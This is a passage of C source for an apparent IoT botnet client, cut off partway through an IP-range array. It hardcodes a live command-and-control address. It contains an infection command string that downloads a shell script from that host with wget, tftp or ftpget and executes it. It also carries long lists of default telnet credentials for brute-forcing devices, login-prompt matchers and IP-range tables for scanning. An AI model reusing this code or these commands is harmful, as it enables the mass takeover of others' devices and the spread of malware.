client.c

1. #define PR_SET_NAME 15
2. #define SERVER_LIST_SIZE (sizeof(commServer) / sizeof(unsigned char *))
3. #define PAD_RIGHT 1
4. #define PAD_ZERO 2
5. #define PRINT_BUF_LEN 12
6. #define CMD_IAC 255
7. #define CMD_WILL 251
8. #define CMD_WONT 252
9. #define CMD_DO 253
10. #define CMD_DONT 254
11. #define OPT_SGA 3
12. #define STD2_STRING "dts"
13. #define STD2_SIZE 50
14. #define BUFFER_SIZE 1024
15.  
16. #include <stdlib.h>
17. #include <stdarg.h>
18. #include <stdio.h>
19. #include <sys/socket.h>
20. #include <sys/types.h>
21. #include <netinet/in.h>
22. #include <arpa/inet.h>
23. #include <netdb.h>
24. #include <signal.h>
25. #include <strings.h>
26. #include <string.h>
27. #include <sys/utsname.h>
28. #include <unistd.h>
29. #include <fcntl.h>
30. #include <errno.h>
31. #include <netinet/ip.h>
32. #include <netinet/udp.h>
33. #include <netinet/tcp.h>
34. #include <sys/wait.h>
35. #include <sys/ioctl.h>
36. #include <net/if.h>
37. #include <pthread.h>
38.  
39.  
40. unsigned char *commServer[] =
41. {
42. "50.115.166.17:666"
43. };
44.  
45. char *useragents[] = {
46. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
47. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
48. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
49. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
50. "Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
51. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
52. "Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
53. "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
54. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
55. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1",
56. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
57. "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
58. "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
59. "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
60. "Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
61. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:13.0) Gecko/20100101 Firefox/13.0.1",
62. "Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
63. "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]",
64. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0",
65. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
66. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6",
67. "Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
68. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)",
69. };
70.  
71.  
72. int initConnection();
73. int getBogos(unsigned char *bogomips);
74. int getCores();
75. int getCountry(unsigned char *buf, int bufsize);
76. void makeRandomStr(unsigned char *buf, int length);
77. int sockprintf(int sock, char *formatStr, ...);
78. char *inet_ntoa(struct in_addr in);
79.  
80. int mainCommSock = 0, currentServer = -1, gotIP = 0;
81. uint32_t *pids;
82. uint32_t scanPid;
83. uint64_t numpids = 0;
84. struct in_addr ourIP;
85. struct in_addr ourPublicIP;
86. unsigned char macAddress[6] = {0};
87.  
88. //char *infect = "cd /tmp || cd /var/system || cd /mnt || cd /lib; rm -fr b1.sh b2.sh b3.sh b4.sh; wget http://50.115.166.17/b1.sh; chmod 777 b1.sh; sh b1.sh; tftp 50.115.166.17 -c get b3.sh; chmod 777 b3.sh; sh b3.sh; tftp -r b4.sh -g 50.115.166.17; chmod 777 b4.sh; sh b4.sh;ftpget -v -u anonymous -p anonymous -P 21 50.115.166.17 b2.sh b2.sh; sh b2.sh; rm -rf b1.sh b3.sh b4.sh b2.sh; rm -rf kekmy*\r\n";
89. char *infect = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || busybox cd /tmp || busybox cd /var/run || busybox cd /mnt || busybox cd /root || busybox cd / || /bin/busybox cd /tmp || /bin/busybox cd /var/run || /bin/busybox cd /mnt || /bin/busybox cd /root || /bin/busybox cd /; wget http://50.115.166.17/bbins.sh; busybox wget http://50.115.166.17/bbins.sh; /bin/busybox wget http://50.115.166.17/bbins.sh; /usr/busybox wget http://50.115.166.17/bbins.sh; ftpget -v -u anonymous -p anonymous -P 21 50.115.166.17 bbins.sh bbins.sh; busybox ftpget -v -u anonymous -p anonymous -P 21 50.115.166.17 bbins.sh bbins.sh; /bin/busybox ftpget -v -u anonymous -p anonymous -P 21 50.115.166.17 bbins.sh bbins.sh; /usr/busybox ftpget -v -u anonymous -p anonymous -P 21 50.115.166.17 bbins.sh bbins.sh; chmod 777 bbins.sh; busybox chmod 777 bbins.sh; /bin/busybox chmod 777 bbins.sh; /usr/busybox chmod 777 bbins.sh; ./bbins.sh; rm -rf bbins.sh; busybox rm -rf bbins.sh; /bin/busybox rm -rf bbins.sh; /usr/busybox rm -rf bbins.sh\r\n";
90. char *usernames[] = {
91. "root\0",
92. "root\0",
93. "admin\0",
94. "root\0",
95. "admin\0",
96. "root\0",
97. "admin\0",
98. "support\0"
99. "root\0", //root:xc3511
100. "root\0", //root:vizxv
101. "root\0", //root:admin
102. "admin\0", //admin:admin
103. "root\0", //root:888888
104. "root\0", //root:xmhdipc
105. "root\0", //root:default
106. "root\0", //root:juantech
107. "root\0", //root:123456
108. "root\0", //root:54321
109. "support\0", //support:support
110. "root\0", //root:(none)
111. "admin\0", //admin:password
112. "root\0", //root:root
113. "root\0", //root:12345
114. "user\0", //user:user
115. "admin\0", //admin:(none)
116. "root\0", //root:pass
117. "admin\0", //admin:admin1234
118. "root\0", //root:1111
119. "admin\0", //admin:smcadmin
120. "admin\0", //admin:1111
121. "root\0", //root:666666
122. "root\0", //root:password
123. "root\0", //root:1234
124. "root\0", //root:klv123
125. "Administrator\0", //Administrator:admin
126. "service\0", //service:service
127. "supervisor\0", //supervisor:supervisor
128. "guest\0", //guest:guest
129. "guest\0", //guest:12345
130. "guest\0", //guest:12345
131. "admin1\0", //admin1:password
132. "administrator\0", //administrator:1234
133. "666666\0", //666666:666666
134. "888888\0", //888888:888888
135. "ubnt\0", //ubnt:ubnt
136. "klv1234\0", //root:klv1234
137. "Zte521\0", //root:Zte521
138. "hi3518\0", //root:hi3518
139. "jvbzd\0", //root:jvbzd
140. "anko\0", //root:anko
141. "zlxx\0", //root:zlxx
142. "7ujMko0vizxv\0", //root:7ujMko0vizxv
143. "7ujMko0admin\0", //root:7ujMko0admin
144. "system\0", //root:system
145. "ikwb\0", //root:ikwb
146. "dreambox\0", //root:dreambox
147. "user\0", //root:user
148. "realtek\0", //root:realtek
149. "00000000\0", //root:00000000
150. "1111111\0", //admin:1111111
151. "1234\0", //admin:1234
152. "12345\0", //admin:12345
153. "54321\0", //admin:54321
154. "123456\0", //admin:123456
155. "7ujMko0admin\0", //admin:7ujMko0admin
156. "1234\0", //admin:1234
157. "pass\0", //admin:pass
158. "meinsm\0", //admin:meinsm
159. "tech\0", //tech:tech
160. "fucker\0", //mother:fucker
161.  
162. };
163. char *passwords[] = {
164. "\0",
165. "123456\0",
166. "12345\0",
167. "123456\0",
168. "password\0",
169. "xc3511\0",
170. "antslq\0",
171. "vizxv\0",
172. "support\0"
173. "xc3511\0", //root:xc3511
174. "vizxv\0", //root:vizxv
175. "admin\0", //root:admin
176. "admin\0", //admin:admin
177. "888888\0", //root:888888
178. "xmhdipc\0", //root:xmhdipc
179. "default\0", //root:default
180. "juantech\0", //root:juantech
181. "123456\0", //root:123456
182. "54321\0", //root:54321
183. "support\0", //support:support
184. "\0", //root:(none)
185. "password\0", //admin:password
186. "root\0", //root:root
187. "12345\0", //root:12345
188. "user\0", //user:user
189. "\0", //admin:(none)
190. "pass\0", //root:pass
191. "admin1234\0", //admin:admin1234
192. "1111\0", //root:1111
193. "smcadmin\0", //admin:smcadmin
194. "1111\0", //admin:1111
195. "666666\0", //root:666666
196. "password\0", //root:password
197. "klv123\0", //root:klv123
198. "service\0", //service:service
199. "supervisor\0", //supervisor:supervisor
200. "guest\0", //guest:guest
201. "12345\0", //guest:12345
202. "12345\0", //guest:12345
203. "password\0", //admin1:password
204. "1234\0", //administrator:1234
205. "666666\0", //666666:666666
206. "888888\0", //888888:888888
207. "ubnt\0", //ubnt:ubnt
208. "klv1234\0", //root:klv1234
209. "Zte521\0", //root:Zte521
210. "hi3518\0", //root:hi3518
211. "jvbzd\0", //root:jvbzd
212. "anko\0", //root:anko
213. "zlxx\0", //root:zlxx
214. "7ujMko0vizxv\0", //root:7ujMko0vizxv
215. "7ujMko0admin\0", //root:7ujMko0admin
216. "system\0", //root:system
217. "ikwb\0", //root:ikwb
218. "dreambox\0", //root:dreambox
219. "user\0", //root:user
220. "realtek\0", //root:realtek
221. "00000000\0", //root:00000000
222. "1111111\0", //admin:1111111
223. "12345\0", //admin:12345
224. "54321\0", //admin:54321
225. "123456\0", //admin:123456
226. "7ujMko0admin\0", //admin:7ujMko0admin
227. "pass\0", //admin:pass
228. "meinsm\0", //admin:meinsm
229. "tech\0", //tech:tech
230. "fucker\0", //mother:fucker
231.  
232. };
233. char* tmpdirs[] = {"/dev/netslink/", "/tmp/", "/var/", "/dev/", "/var/run/", "/dev/shm/", "/mnt/", "/boot/", "/usr/", (char*) 0};
234. char* advances[] = {":", "ogin", "sername", "assword", (char*)0};
235. char* fails[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", (char*)0};
236. char* successes[] = {"busybox", "$", "#", (char*)0};
237. char* infected[] = {"420BLAZEITFGT"};
238. char *infectedmessage = "420BLAZEITFGT";
239. char* advances2[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", "busybox", "$", "#", (char*)0};
240. int oldranges[] = {1,1,1,1,1,1,101,101,101,103,103,103,103,103,105,106,106,109,109,109,109,109,111,112,112,112,112,112,112,113,113,113,114,114,115,115,115,115,117,117,117,118,118,118,118,118,118,118,118,119,119,119,119,120,120,120,121,121,121,121,121,121,122,122,122,122,122,122,122,122,122,122,123,123,124,124,124,124,124,124,125,125,125,125,125,125,125,125,128,128,131,131,131,132,138,14,14,14,14,14,14,14,14,14,14,14,14,140,141,148,151,162,163,165,165,166,166,166,166,166,166,166,166,167,168,173,173,173,174,175,175,175,175,175,175,175,175,176,176,177,177,177,177,177,177,177,177,178,178,178,179,179,179,179,180,181,181,181,182,182,182,182,182,182,182,182,185,185,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,187,187,187,187,188,188,189,189,189,189,189,190,190,190,190,190,190,190,190,190,190,190,190,190,190,190,190,191,191,191,191,191,191,191,191,191,191,191,191,191,192,193,193,196,196,197,198,2,2,2,2,200,200,200,200,201,201,201,201,201,201,201,201,201,201,202,202,202,202,202,202,202,203,203,203,203,203,203,203,203,203,203,206,209,209,210,210,210,210,210,210,210,210,210,210,210,210,211,211,211,211,211,211,211,211,211,211,211,211,211,211,212,212,212,213,213,213,213,213,213,213,217,218,218,219,219,219,220,220,220,220,220,220,221,221,221,221,221,222,222,222,222,222,222,223,223,223,223,24,24,27,27,27,31,31,31,31,31,31,31,36,37,37,37,37,37,37,37,37,41,41,41,41,41,41,42,42,43,43,45,45,46,46,46,46,46,46,46,46,49,49,49,49,5,5,5,5,5,5,5,5,50,52,58,58,58,58,58,59,59,59,59,59,59,60,61,61,61,61,61,61,61,61,61,61,61,61,61,61,62,64,66,68,69,70,71,72,72,74,75,77,77,77,77,78,78,78,78,78,78,79,79,79,8,80,80,80,80,80,80,80,80,80,81,81,81,81,82,82,82,82,83,83,83,83,83,83,83,83,83,84,84,84,84,85,85,85,85,85,85,85,86,86,86,86,87,87,87,88,88,88,88,88,88,88,88,89,89,89,89,89,89,90,91,91,91,91,91,91,91,92,93,93,93,94,94,94,94,94,95,95,95,95,95,95,95,95,95,95,96,98,98};
241. int oldranges2[] = {10,176,213,232,245,4,108,231,51,193,206,25,43,62,98,105,240,161,197,232,60,86,69,163,169,219,220,67,76,11,198,53,69,99,127,160,91,93,123,16,17,128,173,175,217,220,35,36,37,194,203,92,93,237,29,51,120,121,137,58,65,73,128,160,170,178,199,2,3,52,53,54,108,200,105,106,107,119,128,28,107,127,132,24,25,26,27,7,0,46,0,108,72,248,94,160,162,167,168,174,175,177,185,191,201,33,48,93,64,204,100,254,172,132,229,130,141,154,161,241,248,251,78,142,167,238,239,255,58,126,192,201,224,226,228,231,232,121,96,113,19,22,35,69,70,87,99,136,150,208,184,40,56,57,180,138,141,226,52,65,68,70,71,72,75,76,69,87,103,106,112,113,114,115,116,117,118,119,128,129,130,133,134,135,138,148,15,155,177,178,179,183,192,194,195,201,215,218,219,226,227,233,235,236,237,242,249,251,39,46,54,56,57,58,59,60,61,62,65,67,92,95,109,50,61,95,243,3,114,149,55,96,98,121,15,155,174,175,176,178,179,252,254,40,43,48,49,50,80,194,197,199,203,241,26,31,37,6,81,83,84,98,154,34,68,205,44,246,144,227,232,235,38,103,161,205,23,124,179,222,230,240,49,55,67,71,77,103,137,151,31,41,44,62,109,123,223,236,237,238,242,249,252,253,192,102,225,102,105,111,119,16,181,213,216,217,91,92,93,105,119,195,208,216,229,232,238,239,245,254,36,37,44,103,156,179,164,190,230,232,250,46,85,57,56,65,149,233,240,127,149,66,67,69,93,145,164,166,210,7,110,170,172,174,211,212,237,242,95,99,2,31,0,1,126,135,146,163,186,23,42,8,96,1,132,143,151,158,221,77,98,143,162,34,65,74,82,115,61,239,245,242,64,149,19,29,39,42,44,48,63,136,144,145,213,11,137,140,141,199,81,82,83,167,221,137,140,187,213,244,11,120,25,30,94,95,175,148,152,177,183,230,234,235,251,32,36,7,72,78,85,176,19,108,12,36,33,87,17,219,59,151,108,209,35,94,139,158,186,188,189,61,126,142,49,40,188,221,242,249,250,54,78,82,85,19,220,45,74,151,52,53,55,11,12,132,174,22,221,233,237,24,124,22,237,238,104,105,109,173,64,95,99,110,122,53,99,117,15,239,147,204,225,234,247,248,249,28,142,200,207,212,22,248,157,102,135,137,140,158,200,221,92,100,103,190,215,29,40,56,70,152,210,227,244,37,39,46,53,69,9,30,124,207};
242. int rangesA[] = {1,101,103,109,112,115,118,121,122,124,125,128,131,14,173,175,176,178,180,181,182,186,188,189,196,202,203,210,211,212,216,220,27,31,37,41,43,45,46,49,5,50,59,61,62,77,78,79,80,82,83,85,87,88,89,91,93,94,95};
243. int rangesB1[] = {1,1,101,103,103,103,103,103,103,103,103,103,103,103,103,103,103,109,109,111,112,115,118,118,120,121,122,122,122,124,124,125,125,125,128,131,14,14,14,14,14,14,14,14,14,14,14,167,173,175,176,176,178,179,180,181,182,182,182,182,186,186,186,186,186,186,186,186,188,188,189,189,189,190,196,202,202,203,203,210,211,211,212,212,213,216,220,27,27,31,31,31,31,31,37,37,37,41,41,41,43,43,43,43,45,45,45,45,45,46,46,46,46,49,49,5,5,5,50,50,59,59,61,61,61,62,77,77,77,77,78,78,78,78,79,80,80,82,82,82,82,83,83,83,85,85,85,85,85,85,87,88,88,88,88,88,88,88,88,88,89,89,91,93,93,93,94,94,95,95,95,95,95,95,95};
244. int rangesB2[] = {10,70,108,193,195,198,203,206,214,220,242,30,35,43,49,55,62,197,86,69,169,160,173,35,237,137,178,53,54,107,119,107,132,24,0,72,160,162,167,168,174,175,177,185,191,201,27,142,255,201,121,96,136,184,180,226,52,68,71,75,112,114,117,177,227,236,251,67,243,3,149,169,55,43,44,44,62,109,150,213,216,229,103,156,250,51,93,0,1,135,163,23,42,8,1,143,158,143,65,82,230,239,245,252,115,120,121,127,252,39,42,48,63,144,145,105,137,141,203,233,120,95,177,7,85,176,108,209,35,94,139,186,188,189,126,250,82,52,53,55,71,12,221,24,104,105,109,173,95,99,117,147,204,225,234,247,248,249,251,3,200,248,140,100,103,190,29,70,152,210,37,46,53,69,9};
245. int rangesC1[] = {1,1,101,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,103,109,109,111,112,115,118,118,118,118,118,118,120,121,122,122,122,122,124,124,125,125,125,128,131,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,167,173,175,175,176,176,178,179,180,181,182,182,182,182,182,182,182,182,186,186,186,186,186,186,186,186,186,186,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,189,189,189,190,196,202,202,202,202,202,202,202,202,202,203,203,210,211,211,212,212,212,212,212,212,212,212,212,212,212,212,212,212,212,212,212,212,213,216,220,220,27,27,27,27,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,31,37,37,37,37,37,37,37,41,41,41,41,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,43,45,45,45,45,45,45,45,45,45,45,45,45,45,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,46,49,49,49,49,49,49,49,49,49,49,5,5,5,5,5,5,5,5,5,50,50,59,59,59,59,61,61,61,61,61,61,62,77,77,77,77,77,77,77,77,77,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,78,79,79,79,79,80,80,80,80,82,82,82,82,82,82,82,82,83,83,83,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,87,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,89,89,91,93,93,93,93,93,93,94,94,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95};
246. int rangesC2[] = {10,70,108,193,195,195,198,198,198,203,203,203,206,214,214,220,242,242,242,30,30,30,35,35,43,49,55,62,62,62,197,86,69,169,160,173,173,173,173,173,35,237,137,178,178,53,54,107,119,107,132,24,0,72,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,162,167,167,167,168,168,168,174,174,174,174,174,174,174,175,175,175,175,175,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,177,185,185,185,185,185,185,185,185,185,185,185,185,191,191,191,191,191,201,27,142,255,201,201,121,96,136,184,180,226,52,52,68,71,71,75,75,75,112,114,117,177,227,236,251,67,67,67,243,243,243,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,149,169,55,43,44,44,44,44,44,44,44,44,44,62,109,150,213,216,229,103,103,103,103,103,156,156,156,156,156,156,156,156,156,156,156,156,156,250,51,93,93,0,0,0,1,135,163,163,163,23,23,23,23,23,23,23,23,23,23,42,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,1,1,143,158,158,158,158,143,65,82,82,230,230,230,230,239,239,239,239,245,245,245,245,245,245,245,245,245,245,245,245,245,245,245,245,252,252,252,252,252,115,115,120,120,121,121,121,127,127,252,252,252,252,39,42,42,42,42,48,48,48,48,48,48,48,48,63,63,63,63,144,144,144,144,144,144,145,145,145,145,105,137,141,141,141,141,141,141,141,203,233,120,95,95,95,177,7,7,7,7,85,176,108,108,209,35,35,35,35,94,94,139,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,189,126,126,126,126,250,250,250,82,52,52,53,53,53,55,55,71,12,221,24,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,109,109,109,109,173,173,173,173,173,173,173,173,173,95,95,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,99,117,147,147,147,147,147,204,225,225,225,225,225,225,225,225,225,225,234,234,234,234,234,234,234,234,234,234,234,234,234,234,234,234,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,247,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,248,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,249,251,3,200,248,140,100,100,100,100,103,190,29,70,152,152,152,152,152,210,37,37,37,37,37,37,37,46,46,53,53,53,69,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9};
247. int rangesC3[] = {245,80,29,117,198,199,28,29,30,184,185,187,250,64,67,220,60,61,63,252,253,254,54,81,6,253,170,147,41,43,218,220,80,211,89,100,101,103,96,97,197,157,49,80,84,242,111,193,192,105,66,171,62,45,1,10,12,14,2,25,3,32,34,35,4,46,51,56,60,61,63,69,78,8,80,86,89,9,0,120,121,122,13,130,131,139,14,140,141,15,16,164,2,20,22,224,225,226,228,231,232,233,234,235,236,237,238,28,29,31,5,6,72,75,76,77,82,9,34,35,52,144,166,242,104,105,106,107,108,109,111,170,171,224,225,226,1,100,101,102,103,104,105,106,107,108,109,11,110,112,113,115,116,118,120,121,122,125,126,127,128,13,142,143,16,168,169,17,171,172,173,176,178,179,18,19,20,21,24,244,247,25,26,27,28,29,30,31,32,34,35,37,60,66,8,96,97,98,99,201,202,203,204,205,206,207,232,32,33,36,38,16,17,19,22,23,82,155,130,184,237,48,7,193,233,162,46,141,109,84,221,119,144,104,191,213,228,185,242,188,26,36,227,131,204,217,130,155,215,100,107,123,127,149,161,171,191,214,34,37,38,59,74,9,122,53,133,51,32,227,232,233,234,235,249,253,254,92,110,131,58,25,146,112,114,120,121,124,172,173,204,206,208,209,210,212,216,217,218,219,223,64,166,253,98,170,177,67,133,117,2,21,61,11,151,161,186,188,212,214,240,28,73,69,126,127,128,131,136,154,158,168,186,249,34,35,76,78,86,90,95,130,53,90,103,210,236,69,2,160,128,138,172,173,174,175,68,69,70,71,136,137,138,139,148,149,150,151,156,157,158,159,208,209,210,211,25,30,31,33,35,140,143,56,58,188,190,191,41,43,180,181,182,183,196,27,29,42,59,144,155,156,158,189,195,203,208,0,131,198,232,152,207,223,248,28,98,109,149,52,57,43,156,145,179,184,33,37,67,92,78,203,240,2,207,62,237,173,178,187,190,161,4,211,219,2,146,18,216,8,105,106,215,10,110,111,114,116,117,12,120,124,128,129,130,133,136,141,143,144,150,151,153,159,16,160,163,169,17,170,173,174,177,178,179,18,181,182,184,187,189,191,194,196,197,198,2,20,200,203,204,206,207,209,210,22,24,243,244,